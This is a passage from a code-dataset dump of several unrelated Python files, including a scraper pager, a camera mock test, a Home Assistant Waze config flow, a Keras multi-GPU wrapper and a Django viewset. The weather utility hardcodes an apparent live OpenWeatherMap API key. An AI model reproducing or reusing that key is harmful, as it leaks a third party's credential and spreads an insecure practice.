parse.parse_qs(parsed_url.query)\n\n if 'pager' in response.url:\n url_parameters['pager.offset'][0] = int(url_parameters['pager.offset'][0]) + 20\n return parsed_url._replace(query=parse.urlencode(url_parameters, doseq=True)).geturl()\n else:\n return f\"http://www.aldiwanalarabi.com/poetPage.do?sortBy=By_POEM_LINES_COUNT&poetId={url_parameters['poetId'][0]}&pager.offset=20\" # noqa: E501\n", "repo_name": "ARBML/tnqeeb", "sub_path": "ashaar/src/websites/aldiwan_alarabi/processors/aldiwan_alarabi_poet_processor.py", "file_name": "aldiwan_alarabi_poet_processor.py", "file_ext": "py", "file_size_in_byte": 2261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ashaar.src.base.processors.PoetProcessor", "line_number": 14, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 19, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 36, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 39, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 42, "usage_type": "name"}, {"api_name": "ashaar.src.utils.process_multi_spaces", "line_number": 46, "usage_type": "call"}, {"api_name": "ashaar.src.base.constants.UNSPECIFIED", "line_number": 48, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 50, "usage_type": "name"}, {"api_name": "urllib.parse.urlsplit", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse", 
"line_number": 51, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qs", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 52, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "30193572405", "text": "import logging\nfrom camera import Camera\nfrom mock import MagicMock\nimport time\n\ndef test_camera_mock():\n \n try:\n camera_mock = PicameraMock()\n \n camera = Camera(camera_mock)\n camera.take_picture()\n camera.start_recording()\n \n time.sleep(15)\n \n camera.stop_recording()\n \n time.sleep(5)\n \n camera.start_recording()\n \n time.sleep(5)\n \n camera.take_picture()\n \n time.sleep(10)\n \n camera.stop_recording()\n \n time.sleep(5)\n \n camera.take_picture()\n \n time.sleep(5)\n \n \n #camera.stop()\n \n except KeyboardInterrupt:\n print(\"stooooppp\")\n raise\n \nclass PicameraMock(MagicMock):\n def wait_recording(self, duration):\n time.sleep(2)\n \n def start_recording(self, outstream, format=None, bitrate = None, quality=None):\n self.recording = True\n \n def stop_recording(self):\n self.recording = False\n \ntest_camera_mock()", "repo_name": "monsendag/melis-server", "sub_path": "tests/test_camera.py", "file_name": "test_camera.py", "file_ext": "py", "file_size_in_byte": 1087, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "camera.Camera", "line_number": 11, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 12, "usage_type": "call"}, {"api_name": "camera.start_recording", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "camera.stop_recording", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "camera.start_recording", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "camera.stop_recording", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "3683756810", "text": "from genericpath import exists\nimport json\n\nclass FileManager:\n @staticmethod\n def createJSONFile(filename, content):\n try:\n file = open(\"{}.json\".format(filename), \"a\")\n jsoncontent = json.dumps(content,indent=3)\n file.write(jsoncontent)\n except FileExistsError:\n pass\n\n @staticmethod\n def checkFileExists(filename):\n return exists(filename)\n\n # Reads a JSON file and returns an object\n @staticmethod\n def readJSONFile(filename):\n # read file\n with open(\"{}.json\".format(filename), 'r') as jsonfile:\n data=jsonfile.read()\n # parse file\n jsonobject = json.loads(data)\n return jsonobject\n", "repo_name": "fsv2860/transfer-playlists", "sub_path": "src/files.py", "file_name": "files.py", "file_ext": "py", 
"file_size_in_byte": 719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "genericpath.exists", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "7206403357", "text": "\"\"\"Config flow for Waze Travel Time integration.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries\nfrom homeassistant.const import CONF_NAME, CONF_REGION\nfrom homeassistant.core import HomeAssistant, callback\nimport homeassistant.helpers.config_validation as cv\n\nfrom .const import (\n CONF_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS,\n CONF_DESTINATION,\n CONF_EXCL_FILTER,\n CONF_INCL_FILTER,\n CONF_ORIGIN,\n CONF_REALTIME,\n CONF_UNITS,\n CONF_VEHICLE_TYPE,\n DEFAULT_AVOID_FERRIES,\n DEFAULT_AVOID_SUBSCRIPTION_ROADS,\n DEFAULT_AVOID_TOLL_ROADS,\n DEFAULT_NAME,\n DEFAULT_REALTIME,\n DEFAULT_VEHICLE_TYPE,\n DOMAIN,\n REGIONS,\n UNITS,\n VEHICLE_TYPES,\n)\nfrom .helpers import is_valid_config_entry\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef is_dupe_import(\n hass: HomeAssistant, entry: config_entries.ConfigEntry, user_input: dict[str, Any]\n) -> bool:\n \"\"\"Return whether imported config already exists.\"\"\"\n entry_data = {**entry.data, **entry.options}\n defaults = {\n CONF_REALTIME: DEFAULT_REALTIME,\n CONF_VEHICLE_TYPE: DEFAULT_VEHICLE_TYPE,\n CONF_UNITS: hass.config.units.name,\n CONF_AVOID_FERRIES: DEFAULT_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS: DEFAULT_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS: DEFAULT_AVOID_TOLL_ROADS,\n }\n\n for key in (\n CONF_ORIGIN,\n CONF_DESTINATION,\n CONF_REGION,\n CONF_INCL_FILTER,\n CONF_EXCL_FILTER,\n CONF_REALTIME,\n CONF_VEHICLE_TYPE,\n CONF_UNITS,\n CONF_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS,\n ):\n # If the key is present the check is simple\n if key in user_input and user_input[key] != entry_data[key]:\n return False\n\n # If the key is not present, then we have to check if the key has a default and\n # if the default is in the options. 
If it doesn't have a default, we have to check\n # if the key is in the options\n if key not in user_input:\n if key in defaults and defaults[key] != entry_data[key]:\n return False\n\n if key not in defaults and key in entry_data:\n return False\n\n return True\n\n\nclass WazeOptionsFlow(config_entries.OptionsFlow):\n \"\"\"Handle an options flow for Waze Travel Time.\"\"\"\n\n def __init__(self, config_entry: config_entries.ConfigEntry) -> None:\n \"\"\"Initialize waze options flow.\"\"\"\n self.config_entry = config_entry\n\n async def async_step_init(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n if user_input is not None:\n return self.async_create_entry(\n title=\"\",\n data={k: v for k, v in user_input.items() if v not in (None, \"\")},\n )\n\n return self.async_show_form(\n step_id=\"init\",\n data_schema=vol.Schema(\n {\n vol.Optional(\n CONF_INCL_FILTER,\n default=self.config_entry.options.get(CONF_INCL_FILTER, \"\"),\n ): cv.string,\n vol.Optional(\n CONF_EXCL_FILTER,\n default=self.config_entry.options.get(CONF_EXCL_FILTER, \"\"),\n ): cv.string,\n vol.Optional(\n CONF_REALTIME,\n default=self.config_entry.options[CONF_REALTIME],\n ): cv.boolean,\n vol.Optional(\n CONF_VEHICLE_TYPE,\n default=self.config_entry.options[CONF_VEHICLE_TYPE],\n ): vol.In(VEHICLE_TYPES),\n vol.Optional(\n CONF_UNITS,\n default=self.config_entry.options[CONF_UNITS],\n ): vol.In(UNITS),\n vol.Optional(\n CONF_AVOID_TOLL_ROADS,\n default=self.config_entry.options[CONF_AVOID_TOLL_ROADS],\n ): cv.boolean,\n vol.Optional(\n CONF_AVOID_SUBSCRIPTION_ROADS,\n default=self.config_entry.options[\n CONF_AVOID_SUBSCRIPTION_ROADS\n ],\n ): cv.boolean,\n vol.Optional(\n CONF_AVOID_FERRIES,\n default=self.config_entry.options[CONF_AVOID_FERRIES],\n ): cv.boolean,\n }\n ),\n )\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for Waze Travel Time.\"\"\"\n\n VERSION = 1\n\n @staticmethod\n @callback\n def async_get_options_flow(\n config_entry: config_entries.ConfigEntry,\n ) -> WazeOptionsFlow:\n \"\"\"Get the options flow for this handler.\"\"\"\n return WazeOptionsFlow(config_entry)\n\n async def async_step_user(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n errors = {}\n user_input = user_input or {}\n\n if user_input:\n # We need to prevent duplicate imports\n if self.source == config_entries.SOURCE_IMPORT and any(\n is_dupe_import(self.hass, entry, user_input)\n for entry in self.hass.config_entries.async_entries(DOMAIN)\n if entry.source == config_entries.SOURCE_IMPORT\n ):\n return self.async_abort(reason=\"already_configured\")\n\n if (\n self.source == config_entries.SOURCE_IMPORT\n or await self.hass.async_add_executor_job(\n is_valid_config_entry,\n self.hass,\n _LOGGER,\n user_input[CONF_ORIGIN],\n user_input[CONF_DESTINATION],\n user_input[CONF_REGION],\n )\n ):\n return self.async_create_entry(\n title=user_input.get(CONF_NAME, DEFAULT_NAME),\n data=user_input,\n )\n\n # If we get here, it's because we couldn't connect\n errors[\"base\"] = \"cannot_connect\"\n\n return self.async_show_form(\n step_id=\"user\",\n data_schema=vol.Schema(\n {\n vol.Required(\n CONF_NAME, default=user_input.get(CONF_NAME, DEFAULT_NAME)\n ): cv.string,\n vol.Required(CONF_ORIGIN): cv.string,\n vol.Required(CONF_DESTINATION): cv.string,\n vol.Required(CONF_REGION): vol.In(REGIONS),\n }\n ),\n errors=errors,\n )\n\n async_step_import = async_step_user\n", "repo_name": "NisaarAgharia/home.AI", "sub_path": 
"homeassistant/components/waze_travel_time/config_flow.py", "file_name": "config_flow.py", "file_ext": "py", "file_size_in_byte": 6933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 42, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 42, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "const.CONF_REALTIME", "line_number": 47, "usage_type": "name"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 48, "usage_type": "name"}, {"api_name": "const.CONF_UNITS", "line_number": 49, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 50, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 51, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 52, "usage_type": "name"}, {"api_name": "const.DEFAULT_REALTIME", "line_number": 47, "usage_type": "name"}, {"api_name": "const.DEFAULT_VEHICLE_TYPE", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_FERRIES", "line_number": 50, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_SUBSCRIPTION_ROADS", "line_number": 51, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_TOLL_ROADS", "line_number": 52, "usage_type": "name"}, {"api_name": "const.CONF_ORIGIN", "line_number": 56, "usage_type": "name"}, {"api_name": "const.CONF_DESTINATION", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 58, "usage_type": "name"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 59, "usage_type": "name"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 60, "usage_type": "name"}, {"api_name": "const.CONF_REALTIME", "line_number": 61, "usage_type": "name"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 62, "usage_type": "name"}, {"api_name": "const.CONF_UNITS", "line_number": 63, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 64, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 65, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 66, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.OptionsFlow", "line_number": 85, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 85, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 88, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 88, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 102, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 104, "usage_type": "call"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 105, "usage_type": "argument"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 106, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 108, "usage_type": "call"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 109, "usage_type": "argument"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 110, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 112, "usage_type": 
"call"}, {"api_name": "const.CONF_REALTIME", "line_number": 113, "usage_type": "argument"}, {"api_name": "const.CONF_REALTIME", "line_number": 114, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 116, "usage_type": "call"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 117, "usage_type": "argument"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 118, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 120, "usage_type": "call"}, {"api_name": "const.CONF_UNITS", "line_number": 121, "usage_type": "argument"}, {"api_name": "const.CONF_UNITS", "line_number": 122, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 124, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 125, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 126, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 128, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 129, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 131, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 134, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 135, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 136, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 107, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 107, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 111, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 111, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 115, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 115, "usage_type": "name"}, {"api_name": "voluptuous.In", "line_number": 119, "usage_type": "call"}, {"api_name": "const.VEHICLE_TYPES", "line_number": 119, "usage_type": "argument"}, {"api_name": "voluptuous.In", "line_number": 123, "usage_type": "call"}, {"api_name": "const.UNITS", "line_number": 123, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 127, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 127, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 133, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 133, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 137, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 137, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigFlow", "line_number": 143, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 143, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 143, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 151, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 151, "usage_type": "name"}, {"api_name": "homeassistant.core.callback", "line_number": 149, "usage_type": "name"}, 
{"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 163, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 163, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 165, "usage_type": "argument"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 166, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 171, "usage_type": "name"}, {"api_name": "helpers.is_valid_config_entry", "line_number": 173, "usage_type": "argument"}, {"api_name": "const.CONF_ORIGIN", "line_number": 176, "usage_type": "name"}, {"api_name": "const.CONF_DESTINATION", "line_number": 177, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 178, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_NAME", "line_number": 182, "usage_type": "argument"}, {"api_name": "const.DEFAULT_NAME", "line_number": 182, "usage_type": "argument"}, {"api_name": "voluptuous.Schema", "line_number": 191, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 193, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_NAME", "line_number": 194, "usage_type": "argument"}, {"api_name": "const.DEFAULT_NAME", "line_number": 194, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 196, "usage_type": "call"}, {"api_name": "const.CONF_ORIGIN", "line_number": 196, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 197, "usage_type": "call"}, {"api_name": "const.CONF_DESTINATION", "line_number": 197, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 198, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 198, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 195, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 195, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 196, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 196, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 197, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 197, "usage_type": "name"}, {"api_name": "voluptuous.In", "line_number": 198, "usage_type": "call"}, {"api_name": "const.REGIONS", "line_number": 198, "usage_type": "argument"}]} +{"seq_id": "4148838973", "text": "import torch\nfrom torch import nn\nfrom typing import Any, List\nfrom object_detection.entities import YoloBoxes, PascalBoxes\n\n\ndef centerness(boxes: torch.Tensor) -> torch.Tensor:\n left_right = boxes[:, [0, 2]]\n top_bottom = boxes[:, [1, 3]]\n return torch.sqrt(\n (left_right.min(-1)[0] / left_right.max(-1)[0])\n * (top_bottom.min(-1)[0] / top_bottom.max(-1)[0])\n )\n\n\nclass ToBoxes:\n def __init__(\n self,\n threshold: float,\n top_n: int,\n nms_thresold: float,\n post_top_n: int,\n min_size: float,\n n_classes: int,\n ) -> None:\n self.threshold = threshold\n self.top_n = top_n\n self.nms_thresold = nms_thresold\n self.post_top_n = post_top_n\n self.min_size = min_size\n self.n_classes = n_classes\n\n def 
__call__(\n self, cls_batch: List[Any], box_batch: List[Any], center_batch: List[Any],\n ) -> List[YoloBoxes]:\n ...\n\n\nclass Criterion:\n def __init__(self, sizes: Any, gamma: float, alpha: float,) -> None:\n self.sizes = sizes\n self.gamma = gamma\n self.alpha = alpha\n\n def get_sample_region(\n self,\n gt_boxes: PascalBoxes,\n strides: List[int],\n point_per_level: int,\n xs: torch.Tensor,\n ys: torch.Tensor,\n radius: float,\n ) -> torch.Tensor:\n ...\n", "repo_name": "zhangyahui520/object-detection", "sub_path": "object_detection/models/fcos.py", "file_name": "fcos.py", "file_ext": "py", "file_size_in_byte": 1365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.Tensor", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "object_detection.entities.YoloBoxes", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 40, "usage_type": "name"}, {"api_name": "object_detection.entities.PascalBoxes", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 53, "usage_type": "attribute"}]} +{"seq_id": "42936390138", "text": "import os\nimport time\nimport subprocess\nimport statistics\n\nstep = float(input(\"Input step size: \"))\nstranl = float(input(\"Input lower bound of scanned range: \"))\nstranh = float(input(\"Input upper bound of scanned range: \"))\n\nreadstddev = {}\nsweep = stranl\nlpfb = stranl\nwhile lpfb < stranh:\n\tprint(lpfb)\n\tout = subprocess.call(['./adc.bin', '/dev/spidev1.0', str(lpfb)], stdout=open('test.txt', 'w'), stderr=subprocess.STDOUT)\n\tread_list = []\n\twith open('test.txt') as fp:\n\t\tfor line in fp:\n\t\t\tread_list.append(float(line))\n\t\t\tprint(line)\n\treadstddev[lpfb] = statistics.stdev(read_list)\n\tlpfb=lpfb+step\n\t\nbest = min(readstddev, key=readstddev.get)\nprint(\"Best lambda in sweep: \", best, \" with a std dev of \", readstddev[best])\n", "repo_name": "sho0p/maxim1246acpe_read", "sub_path": "sweep.py", "file_name": "sweep.py", "file_ext": "py", "file_size_in_byte": 728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "subprocess.call", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "statistics.stdev", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "28466525154", "text": "import json,requests\nimport asyncio,aiohttp\nfrom datetime import datetime\n\napi_key = \"1835a413e20e6815f4ebd37b86aad3cf\"\n\ndef get_part_of_day(hour):\n return (\n \"morning\" if 5 <= hour <= 11\n else\n \"afternoon\" if 12 <= hour <= 17\n else\n \"evening\" if 18 <= hour <= 22\n else\n \"night\"\n )\n\ndef get_weather_str_from_list(list_weather):\n return ','.join(\n list(map(lambda x: x['main'], list_weather))\n )\n\ndef get_coord(city:str):\n cities = \"src/city.id.json\"\n data 
= json.loads(open(cities).read())\n return list(filter(lambda x:x[\"name\"].lower() == city.lower(),data))\n\n\ndef get_formated_from_timestamp(timestamp, format : str = None):\n date_time = datetime.fromtimestamp(timestamp)\n if format is None:\n format = \"%A, %B %d, %Y %H:%M:%S\"\n return date_time.strftime(format)\n\ndef get_current_weather(lat,lon,temp=\"default\"):\n url = \"https://api.openweathermap.org/data/2.5/weather?lat=%s&lon=%s&appid=%s&units=%s\" % (lat, lon, api_key, temp)\n response = requests.get(url)\n return json.loads(response.text)\n\ndef get_current_weather_hourly(lat,lon):\n url = \"https://api.openweathermap.org/data/2.5/onecall?lat=%s&lon=%s&appid=%s\" % (lat, lon, api_key)\n response = requests.get(url)\n return json.loads(response.text)\n \nasync def fetch_async(session, url,params={}):\n async with session.get(url,params=params) as response:\n return await response.json()\n\nasync def get_current_weather_async(lat,lon):\n params = {\"lat\": lat,\"lon\": lon,\"appid\": api_key}\n url = \"https://api.openweathermap.org/data/2.5/weather\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url,params=params) as response:\n # print(response.)\n return response.json()\n\n\n", "repo_name": "subhandp/python-tryout", "sub_path": "src/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "16561873742", "text": "from keras import Model\nfrom keras.utils import multi_gpu_model\n\n'''\nKeras 2.2.4 fixes this bug.\n\nTo fix the problem of saving checkpoints for a multi_gpu model, save using the original (serial) model\nhttps://keras.io/LIBS/#multi_gpu_model\n\nmulti_gpu_model\nkeras.LIBS.multi_gpu_model(model, gpus=None, cpu_merge=True, cpu_relocation=False)\n\nReplicates a model on different GPUs.\nSpecifically, this function implements single-machine multi-GPU data parallelism. It works in the following way:\n\nDivide the model's input(s) into multiple sub-batches.\nApply a model copy on each sub-batch. Every model copy is executed on a dedicated GPU.\nConcatenate the results (on CPU) into one big batch.\n\n'''\n\n\nclass ModelMGPU(Model):\n def __init__(self, ser_model, gpus):\n pmodel = multi_gpu_model(ser_model, gpus)\n self.__dict__.update(pmodel.__dict__)\n self._smodel = ser_model\n\n def __getattribute__(self, attrname):\n '''Override load and save methods to be used from the serial-model. 
The\n serial-model holds references to the weights in the multi-gpu model.\n '''\n # return Model.__getattribute__(self, attrname)\n if 'load' in attrname or 'save' in attrname:\n return getattr(self._smodel, attrname)\n\n return super(ModelMGPU, self).__getattribute__(attrname)\n", "repo_name": "linchundan88/fundus_multiple_diseases", "sub_path": "LIBS/CNN_Models/my_multi_gpu.py", "file_name": "my_multi_gpu.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "keras.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "keras.utils.multi_gpu_model", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "17197200547", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\n\nfrom . import serializers\nfrom . import models\nfrom . import logic\nfrom . import pagination\n\nclass GameViewSet(viewsets.ModelViewSet):\n queryset = models.Game.objects.all()\n serializer_class = serializers.GameSerializer\n pagination_class = pagination.CustomResultsSetPagination\n\n @action(detail=True, methods=['get', 'post', 'delete'])\n def player(self, request, pk=None):\n if request.method == 'DELETE':\n return self.player_delete(request, pk)\n elif request.method == 'POST':\n return self.player_add(request, pk)\n return self.player_list(request, pk)\n\n def player_add(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = models.Player.objects.filter(game_id=pk, user=request.user)\n if not player:\n new_player = models.Player()\n new_player.game = game\n new_player.user = request.user\n new_player.save()\n serializer = serializers.PlayerSerializer(new_player)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n raise ValidationError({ 'detail': 'already registered'})\n\n def player_delete(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = models.Player.objects.filter(game_id=pk, user=request.user)\n if player:\n player.delete()\n content = {'detail': 'deleted'}\n return Response({}, 